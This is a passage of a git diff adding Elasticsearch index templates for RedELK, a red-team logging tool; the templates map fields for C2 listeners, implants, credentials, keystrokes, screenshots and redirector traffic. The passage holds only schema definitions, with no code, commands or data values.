+ }, + "platform": { + "ignore_above": 1024, + "type": "keyword" + }, + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "implant": { + "properties": { + "arch": { + "doc_values": true, + "eager_global_ordinals": false, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "checkin": { + "type": "text" + }, + "id": { + "type": "keyword" + }, + "input": { + "type": "text" + }, + "link_mode": { + "type": "keyword" + }, + "linked": { + "type": "boolean" + }, + "log_file": { + "type": "keyword" + }, + "output": { + "type": "text" + }, + "parent_id": { + "type": "keyword" + }, + "sleep": { + "type": "keyword" + }, + "task": { + "type": "keyword" + }, + "url": { + "type": "keyword" + } + }, + "type": "object" + }, + "infra": { + "properties": { + "attack_scenario": { + "doc_values": true, + "eager_global_ordinals": false, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "log_type": { + "type": "keyword" + } + }, + "type": "object" + }, + "input": { + "properties": { + "type": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "ioc": { + "properties": { + "type": { + "type": "keyword" + } + }, + "type": "object" + }, + "log": { + "properties": { + "file": { + "properties": { + "path": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "flags": { + "ignore_above": 1024, + "type": "keyword" + }, + "level": { + "ignore_above": 1024, + "type": "keyword" + }, + "logger": { + "ignore_above": 1024, + "type": "keyword" + }, + "offset": { + "type": "long" + }, + "origin": { + "properties": { + "file": { + "properties": { + "line": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "function": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "original": { + "ignore_above": 1024, + "type": "keyword" + }, + "source": { + "properties": { + "address": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "syslog": { + "properties": { + "facility": { + "properties": { + "code": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "priority": { + "type": "long" + }, + "severity": { + "properties": { + "code": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "message": { + "norms": false, + "type": "text" + }, + "process": { + "properties": { + "name": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "pid": { + "type": "long" + } + }, + "type": "object" + }, + "screenshot": { + "properties": { + "full": { + "type": "keyword" + }, + "thumb": { + "type": "keyword" + } + }, + "type": "object" + }, + "service": { + "properties": { + "name": { + "type": "keyword" + }, + "type": { + "type": "keyword" + } + }, + "type": "object" + }, + "tags": { + "ignore_above": 1024, + "type": "keyword" + }, + "threat": { + "properties": { + "framework": { + "ignore_above": 1024, + "type": "keyword" + }, + "tactic": { + "properties": { + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "reference": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "technique": { + "properties": { + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "reference": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "user": { + "properties": { + "domain": { + "ignore_above": 1024, + "type": "keyword" + }, + "email": { + "ignore_above": 1024, + "type": "keyword" + }, + "hash": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + } + } + }, + "order": 1, + "settings": { + "index": { + "mapping": { + "total_fields": { + "limit": "10000" + } + }, + "number_of_replicas": "0", + "number_of_shards": "1", + "query": { + "default_field": "*" + }, + "refresh_interval": "5s" + } + } +} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_iplist.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_iplist.json new file mode 100644 index 00000000..8deaeef1 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_iplist.json @@ -0,0 +1,61 @@ +{ + "aliases": {}, + "index_patterns": [ + "iplist-*" + ], + "mappings": { + "_routing": { + "required": false + }, + "_source": { + "enabled": true, + "excludes": [], + "includes": [] + }, + "date_detection": true, + "dynamic": true, + "dynamic_date_formats": [ + "strict_date_optional_time", + "yyyy/MM/dd HH:mm:ss Z||yyyy/MM/dd Z" + ], + "numeric_detection": false, + "properties": { + "@timestamp": { + "doc_values": true, + "ignore_malformed": false, + "index": true, + "store": false, + "type": "date" + }, + "date_modified": { + "type": "date" + }, + "ip": { + "type": "ip" + }, + "list": { + "type": "keyword" + }, + "source": { + "type": "keyword" + } + } + }, + "order": 0, + "settings": { + "index": { + "mapping": { + "total_fields": { + "limit": "10000" + } + }, + "number_of_replicas": "0", + "number_of_shards": "1", + "query": { + "default_field": "*" + }, + "refresh_interval": "5s" + } + }, + "version": 1 +} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redelk.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redelk.json new file mode 100644 index 00000000..87d01eb9 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redelk.json @@ -0,0 +1,100 @@ +{ + "aliases": {}, + "index_patterns": [ + "redelk-*" + ], + "mappings": { + "_routing": { + "required": false + }, + "_source": { + "enabled": true, + "excludes": [], + "includes": [] + }, + "date_detection": true, + "dynamic": true, + "dynamic_date_formats": [ + "strict_date_optional_time", + "yyyy/MM/dd HH:mm:ss Z||yyyy/MM/dd Z" + ], + "dynamic_templates": [], + "numeric_detection": true, + "properties": { + "@timestamp": { + "type": "date" + }, + "iplist": { + "properties": { + "comments": { + "type": "text" + }, + "ip": { + "coerce": true, + "index": true, + "store": false, + "type": "ip_range" + }, + "name": { + "type": "keyword" + }, + "source": { + "type": "keyword" + } + }, + "type": "object" + }, + "module": { + "properties": { + "last_run": { + "dynamic": true, + "enabled": true, + "properties": { + "message": { + "type": "text" + }, + "status": { + "type": "keyword" + }, + "timestamp": { + "doc_values": true, + "ignore_malformed": false, + "index": true, + "store": false, + "type": "date" + } + }, + "type": "object" + }, + "name": { + "type": "keyword" + }, + "type": { + "type": "keyword" + } + }, + "type": "object" + }, + "type": { + "type": "keyword" + } + } + }, + "order": 0, + "settings": { + "index": { + "mapping": { + "total_fields": { + "limit": "10000" + } + }, + "number_of_replicas": "0", + "number_of_shards": "1", + "query": { + "default_field": "*" + }, + "refresh_interval": "5s" + } + }, + "version": 1 +} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redirtraffic.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redirtraffic.json new file mode 100644 index 00000000..d48ab86f --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redirtraffic.json @@ -0,0 +1,759 @@ +{ + "aliases": {}, + "index_patterns": [ + "redirtraffic-*" + ], + "mappings": { + "_meta": { + "beat": "rtops", + "version": "7.8.0" + }, + "_routing": { + "required": false + }, + "_source": { + "enabled": true, + "excludes": [], + "includes": [] + }, + "date_detection": false, + "dynamic": true, + "dynamic_templates": [ + { + "labels": { + "mapping": { + "type": "flattened" + }, + "path_match": "alarm.alarm_*" + } + } + ], + "numeric_detection": false, + "properties": { + "@timestamp": { + "type": "date" + }, + "agent": { + "properties": { + "ephemeral_id": { + "ignore_above": 1024, + "type": "keyword" + }, + "hostname": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + }, + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "alarm": { + "properties": { + "alarm_httptraffic": { + "properties": { + "last_alarmed": { + "doc_values": true, + "ignore_malformed": false, + "index": true, + "store": false, + "type": "date_nanos" + }, + "last_checked": { + "type": "date_nanos" + } + }, + "type": "object" + }, + "last_alarmed": { + "type": "date_nanos" + }, + "last_checked": { + "type": "date_nanos" + }, + "timestamp": { + "type": "date" + } + }, + "type": "object" + }, + "ecs": { + "properties": { + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "event": { + "properties": { + "action": { + "ignore_above": 1024, + "type": "keyword" + }, + "category": { + "ignore_above": 1024, + "type": "keyword" + }, + "code": { + "ignore_above": 1024, + "type": "keyword" + }, + "created": { + "type": "date" + }, + "dataset": { + "ignore_above": 1024, + "type": "keyword" + }, + "duration": { + "type": "long" + }, + "end": { + "type": "date" + }, + "hash": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "ingested": { + "type": "date" + }, + "kind": { + "ignore_above": 1024, + "type": "keyword" + }, + "module": { + "ignore_above": 1024, + "type": "keyword" + }, + "original": { + "ignore_above": 1024, + "type": "keyword" + }, + "outcome": { + "ignore_above": 1024, + "type": "keyword" + }, + "provider": { + "ignore_above": 1024, + "type": "keyword" + }, + "reference": { + "ignore_above": 1024, + "type": "keyword" + }, + "risk_score": { + "type": "float" + }, + "risk_score_norm": { + "type": "float" + }, + "sequence": { + "type": "long" + }, + "severity": { + "type": "long" + }, + "start": { + "type": "date" + }, + "timezone": { + "ignore_above": 1024, + "type": "keyword" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + }, + "url": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "greynoise": { + "properties": { + "Name_List": { + "type": "text" + }, + "OS_List": { + "type": "text" + }, + "first_seen": { + "type": "keyword" + }, + "ip": { + "type": "keyword" + }, + "last_result": { + "properties": { + "category": { + "type": "keyword" + }, + "confidence": { + "type": "keyword" + }, + "first_seen": { + "type": "keyword" + }, + "intention": { + "type": "keyword" + }, + "last_updated": { + "type": "keyword" + }, + "metadata": { + "properties": { + "asn": { + "type": "keyword" + }, + "datacenter": { + "type": "text" + }, + "link": { + "type": "text" + }, + "org": { + "type": "text" + }, + "os": { + "type": "text" + }, + "rdns": { + "type": "keyword" + }, + "rdns_parent": { + "type": "keyword" + }, + "tor": { + "type": "boolean" + } + }, + "type": "object" + }, + "name": { + "type": "keyword" + } + }, + "type": "object" + }, + "query_timestamp": { + "type": "date" + }, + "status": { + "type": "keyword" + } + }, + "type": "object" + }, + "host": { + "properties": { + "architecture": { + "ignore_above": 1024, + "type": "keyword" + }, + "domain": { + "ignore_above": 1024, + "type": "keyword" + }, + "hostname": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "ip": { + "type": "ip" + }, + "mac": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "os": { + "properties": { + "build": { + "ignore_above": 1024, + "type": "keyword" + }, + "codename": { + "ignore_above": 1024, + "type": "keyword" + }, + "family": { + "ignore_above": 1024, + "type": "keyword" + }, + "full": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "kernel": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "platform": { + "ignore_above": 1024, + "type": "keyword" + }, + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "http": { + "properties": { + "headers": { + "properties": { + "all": { + "fields": { + "text": { + "type": "text" + } + }, + "type": "keyword" + }, + "forwarded": { + "type": "keyword" + }, + "host": { + "type": "keyword" + }, + "useragent": { + "type": "keyword" + }, + "via": { + "type": "keyword" + }, + "x_forwarded_for": { + "type": "keyword" + }, + "x_forwarded_proto": { + "type": "keyword" + }, + "x_host": { + "type": "keyword" + } + }, + "type": "object" + }, + "request": { + "properties": { + "body": { + "properties": { + "bytes": { + "type": "long" + }, + "content": { + "fields": { + "text": { + "type": "text" + } + }, + "type": "keyword" + } + }, + "type": "object" + }, + "bytes": { + "type": "long" + }, + "method": { + "type": "keyword" + } + }, + "type": "object" + }, + "response": { + "properties": { + "bytes": { + "type": "long" + }, + "status_code": { + "type": "long" + } + }, + "type": "object" + }, + "version": { + "type": "keyword" + } + }, + "type": "object" + }, + "infra": { + "properties": { + "attack_scenario": { + "doc_values": true, + "eager_global_ordinals": false, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "log": { + "dynamic": true, + "enabled": true, + "properties": { + "type": { + "type": "keyword" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "input": { + "properties": { + "type": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "log": { + "properties": { + "file": { + "properties": { + "path": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "level": { + "ignore_above": 1024, + "type": "keyword" + }, + "logger": { + "ignore_above": 1024, + "type": "keyword" + }, + "offset": { + "type": "long" + }, + "origin": { + "properties": { + "file": { + "properties": { + "line": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "function": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "original": { + "ignore_above": 1024, + "type": "keyword" + }, + "source": { + "properties": { + "address": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "syslog": { + "properties": { + "facility": { + "properties": { + "code": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "priority": { + "type": "long" + }, + "severity": { + "properties": { + "code": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "message": { + "norms": false, + "type": "text" + }, + "process": { + "properties": { + "name": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "pid": { + "type": "long" + } + }, + "type": "object" + }, + "redir": { + "properties": { + "backend": { + "properties": { + "name": { + "type": "keyword" + } + }, + "type": "object" + }, + "catchall": { + "eager_global_ordinals": false, + "fielddata": false, + "index": true, + "index_options": "positions", + "index_phrases": false, + "norms": true, + "store": false, + "type": "text" + }, + "frontend": { + "properties": { + "ip": { + "type": "ip" + }, + "name": { + "type": "keyword" + }, + "port": { + "type": "long" + } + }, + "type": "object" + }, + "program": { + "type": "keyword" + }, + "timestamp": { + "type": "text" + } + }, + "type": "object" + }, + "source": { + "properties": { + "as": { + "properties": { + "number": { + "type": "long" + }, + "organization": { + "properties": { + "name": { + "fields": { + "text": { + "type": "text" + } + }, + "type": "keyword" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "cdn": { + "dynamic": true, + "enabled": true, + "properties": { + "domain": { + "type": "keyword" + }, + "ip": { + "type": "ip" + }, + "port": { + "type": "long" + } + }, + "type": "object" + }, + "domain": { + "type": "keyword" + }, + "geo": { + "properties": { + "city_name": { + "type": "keyword" + }, + "continent_name": { + "type": "keyword" + }, + "country_iso_code": { + "type": "keyword" + }, + "country_name": { + "type": "keyword" + }, + "location": { + "type": "geo_point" + }, + "name": { + "type": "keyword" + }, + "region_iso_code": { + "type": "keyword" + }, + "region_name": { + "type": "keyword" + } + }, + "type": "object" + }, + "host_info": { + "properties": { + "build": { + "type": "keyword" + }, + "device": { + "type": "keyword" + }, + "major": { + "type": "keyword" + }, + "minor": { + "type": "keyword" + }, + "name": { + "type": "keyword" + }, + "os": { + "type": "keyword" + }, + "os_name": { + "type": "keyword" + }, + "patch": { + "type": "keyword" + } + }, + "type": "object" + }, + "ip": { + "type": "ip" + }, + "ip_otherproxies": { + "type": "keyword" + }, + "port": { + "type": "long" + } + }, + "type": "object" + }, + "tags": { + "ignore_above": 1024, + "type": "keyword" + } + } + }, + "order": 1, + "settings": { + "index": { + "mapping": { + "total_fields": { + "limit": "10000" + } + }, + "number_of_replicas": "0", + "number_of_shards": "1", + "query": { + "default_field": "*" + }, + "refresh_interval": "5s" + } + } +} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_rtops.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_rtops.json new file mode 100644 index 00000000..494d0fb3 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_rtops.json @@ -0,0 +1,864 @@ +{ + "aliases": {}, + "index_patterns": [ + "rtops-*" + ], + "mappings": { + "_meta": { + "beat": "rtops", + "version": "7.8.0" + }, + "_routing": { + "required": false + }, + "_source": { + "enabled": true, + "excludes": [], + "includes": [] + }, + "date_detection": false, + "dynamic": true, + "dynamic_templates": [ + { + "labels": { + "mapping": { + "type": "flattened" + }, + "path_match": "alarm.alarm_*" + } + } + ], + "numeric_detection": false, + "properties": { + "@timestamp": { + "type": "date" + }, + "agent": { + "properties": { + "ephemeral_id": { + "ignore_above": 1024, + "type": "keyword" + }, + "hostname": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + }, + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "alarm": { + "properties": { + "timestamp": { + "type": "date" + } + }, + "type": "object" + }, + "c2": { + "properties": { + "listener": { + "properties": { + "bind_port": { + "type": "long" + }, + "domains": { + "fields": { + "text": { + "type": "text" + } + }, + "type": "keyword" + }, + "host": { + "type": "keyword" + }, + "name": { + "type": "keyword" + }, + "port": { + "type": "long" + }, + "profile": { + "type": "keyword" + }, + "proxy": { + "type": "keyword" + }, + "type": { + "type": "keyword" + } + }, + "type": "object" + }, + "log": { + "properties": { + "type": { + "type": "keyword" + } + }, + "type": "object" + }, + "message": { + "type": "text" + }, + "operator": { + "doc_values": true, + "eager_global_ordinals": false, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "operator_ip": { + "type": "ip" + }, + "program": { + "type": "keyword" + }, + "timestamp": { + "type": "text" + } + }, + "type": "object" + }, + "creds": { + "properties": { + "credential": { + "type": "keyword" + }, + "host": { + "type": "keyword" + }, + "realm": { + "type": "keyword" + }, + "source": { + "type": "keyword" + }, + "username": { + "type": "keyword" + } + }, + "type": "object" + }, + "ecs": { + "properties": { + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "error": { + "properties": { + "code": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "message": { + "norms": false, + "type": "text" + }, + "stack_trace": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "event": { + "properties": { + "action": { + "ignore_above": 1024, + "type": "keyword" + }, + "category": { + "ignore_above": 1024, + "type": "keyword" + }, + "code": { + "ignore_above": 1024, + "type": "keyword" + }, + "created": { + "type": "date" + }, + "dataset": { + "ignore_above": 1024, + "type": "keyword" + }, + "duration": { + "type": "long" + }, + "end": { + "type": "date" + }, + "enriched_from": { + "type": "keyword" + }, + "hash": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "ingested": { + "type": "date" + }, + "kind": { + "ignore_above": 1024, + "type": "keyword" + }, + "module": { + "ignore_above": 1024, + "type": "keyword" + }, + "original": { + "ignore_above": 1024, + "type": "keyword" + }, + "outcome": { + "ignore_above": 1024, + "type": "keyword" + }, + "provider": { + "ignore_above": 1024, + "type": "keyword" + }, + "reference": { + "ignore_above": 1024, + "type": "keyword" + }, + "risk_score": { + "type": "float" + }, + "risk_score_norm": { + "type": "float" + }, + "sequence": { + "type": "long" + }, + "severity": { + "type": "long" + }, + "start": { + "type": "date" + }, + "timezone": { + "ignore_above": 1024, + "type": "keyword" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + }, + "url": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "file": { + "properties": { + "directory": { + "ignore_above": 1024, + "type": "keyword" + }, + "directory_local": { + "type": "keyword" + }, + "hash": { + "properties": { + "md5": { + "ignore_above": 1024, + "type": "keyword" + }, + "sha1": { + "ignore_above": 1024, + "type": "keyword" + }, + "sha256": { + "ignore_above": 1024, + "type": "keyword" + }, + "sha512": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "path": { + "type": "text" + }, + "path_local": { + "type": "text" + }, + "size": { + "type": "long" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + }, + "url": { + "type": "keyword" + } + }, + "type": "object" + }, + "host": { + "properties": { + "architecture": { + "ignore_above": 1024, + "type": "keyword" + }, + "domain": { + "ignore_above": 1024, + "type": "keyword" + }, + "domain_ext": { + "type": "text" + }, + "ext_domain": { + "type": "keyword" + }, + "geo": { + "properties": { + "as": { + "properties": { + "organization": { + "properties": { + "name": { + "type": "keyword" + }, + "number": { + "type": "integer" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "city_name": { + "type": "keyword" + }, + "continent_name": { + "type": "keyword" + }, + "country_iso_code": { + "type": "keyword" + }, + "country_name": { + "type": "keyword" + }, + "location": { + "type": "geo_point" + }, + "name": { + "type": "keyword" + }, + "region_iso_code": { + "type": "keyword" + }, + "region_name": { + "type": "keyword" + } + }, + "type": "object" + }, + "hostname": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "ip": { + "type": "ip" + }, + "ip_ext": { + "type": "ip" + }, + "ip_int": { + "type": "ip" + }, + "mac": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "os": { + "properties": { + "build": { + "ignore_above": 1024, + "type": "keyword" + }, + "codename": { + "ignore_above": 1024, + "type": "keyword" + }, + "family": { + "ignore_above": 1024, + "type": "keyword" + }, + "full": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "kernel": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "platform": { + "ignore_above": 1024, + "type": "keyword" + }, + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "implant": { + "properties": { + "arch": { + "doc_values": true, + "eager_global_ordinals": false, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "checkin": { + "type": "text" + }, + "child_id": { + "type": "text" + }, + "id": { + "type": "keyword" + }, + "input": { + "type": "text" + }, + "kill_date": { + "type": "text" + }, + "link_mode": { + "type": "keyword" + }, + "linked": { + "type": "boolean" + }, + "log_file": { + "type": "keyword" + }, + "operator": { + "type": "text" + }, + "output": { + "type": "text" + }, + "parent_id": { + "type": "keyword" + }, + "sleep": { + "type": "keyword" + }, + "task": { + "type": "keyword" + }, + "task_id": { + "type": "keyword" + }, + "task_parameters": { + "type": "keyword" + }, + "url": { + "type": "keyword" + } + }, + "type": "object" + }, + "infra": { + "properties": { + "attack_scenario": { + "doc_values": true, + "eager_global_ordinals": false, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "log_type": { + "type": "keyword" + } + }, + "type": "object" + }, + "input": { + "properties": { + "type": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "ioc": { + "properties": { + "type": { + "type": "keyword" + } + }, + "type": "object" + }, + "keystrokes": { + "properties": { + "desktop_session": { + "doc_values": true, + "eager_global_ordinals": false, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "url": { + "type": "keyword" + }, + "user": { + "type": "text" + } + }, + "type": "object" + }, + "log": { + "properties": { + "file": { + "properties": { + "path": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "flags": { + "ignore_above": 1024, + "type": "keyword" + }, + "level": { + "ignore_above": 1024, + "type": "keyword" + }, + "logger": { + "ignore_above": 1024, + "type": "keyword" + }, + "offset": { + "type": "long" + }, + "origin": { + "properties": { + "file": { + "properties": { + "line": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "function": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "original": { + "ignore_above": 1024, + "type": "keyword" + }, + "source": { + "properties": { + "address": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "syslog": { + "properties": { + "facility": { + "properties": { + "code": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "priority": { + "type": "long" + }, + "severity": { + "properties": { + "code": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "message": { + "norms": false, + "type": "text" + }, + "process": { + "properties": { + "name": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "pid": { + "type": "long" + } + }, + "type": "object" + }, + "screenshot": { + "properties": { + "desktop_session": { + "doc_values": true, + "eager_global_ordinals": false, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "file_name": { + "type": "text" + }, + "full": { + "type": "keyword" + }, + "thumb": { + "type": "keyword" + }, + "title": { + "type": "text" + } + }, + "type": "object" + }, + "service": { + "properties": { + "name": { + "type": "keyword" + }, + "type": { + "type": "keyword" + } + }, + "type": "object" + }, + "tags": { + "ignore_above": 1024, + "type": "keyword" + }, + "threat": { + "properties": { + "framework": { + "ignore_above": 1024, + "type": "keyword" + }, + "tactic": { + "properties": { + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "reference": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "technique": { + "properties": { + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "reference": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "type": { + "type": "keyword" + }, + "user": { + "properties": { + "domain": { + "ignore_above": 1024, + "type": "keyword" + }, + "email": { + "ignore_above": 1024, + "type": "keyword" + }, + "hash": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "type": "keyword" + } + }, + "type": "object" + } + } + }, + "order": 1, + "settings": { + "index": { + "mapping": { + "total_fields": { + "limit": "10000" + } + }, + "number_of_replicas": "0", + "number_of_shards": "1", + "query": { + "default_field": "*" + }, + "refresh_interval": "5s" + } + } +} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_dashboard.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_dashboard.ndjson new file mode 100644 index 00000000..a14964ad --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_dashboard.ndjson @@ -0,0 +1,12 @@ +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": 